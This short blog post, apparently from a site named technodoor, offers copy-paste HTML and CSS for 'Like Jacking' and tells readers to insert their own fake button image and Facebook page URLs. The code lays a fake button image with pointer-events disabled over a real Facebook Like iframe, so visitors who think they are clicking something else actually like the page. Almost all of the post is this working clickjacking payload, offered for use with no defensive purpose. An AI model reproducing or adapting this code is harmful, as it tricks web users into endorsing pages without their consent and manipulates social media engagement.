Before You Use the Code For Like Jacking,
Watch Detailed Explanation on how to use this code in Above Video
And Replace the Url in Blue Color With your Fake Button's Url
Replace Url in Pink Coloure With Your Facebook Page Url
Replace Url in Pink Coloure With Your Facebook Page Url
<style type="text/css">
#facebook_like_button_holder {
position:relative;
width:90px;
height: 20px;
color:#fff;
background:black;
}
#facebook_like_button_holder iframe {
position:absolute;
top: 0px;
width: 90px !important;
}
#fake_facebook_button {
pointer-events: none;
position:absolute;
width: 90px;
height: 20px;
left:0;
top:0;
background: url('http://s26.postimg.org/sdvic2zgl/fake_facebook_button.gif');
}
</style>
<div id="facebook_like_button_holder">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/technodoor&layout=button_count&show_faces=true&width=600&action=recommend&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:600px; height:21px;" allowTransparency="true"></iframe>
<div id="fake_facebook_button"></div>
</div>
No comments:
Write comments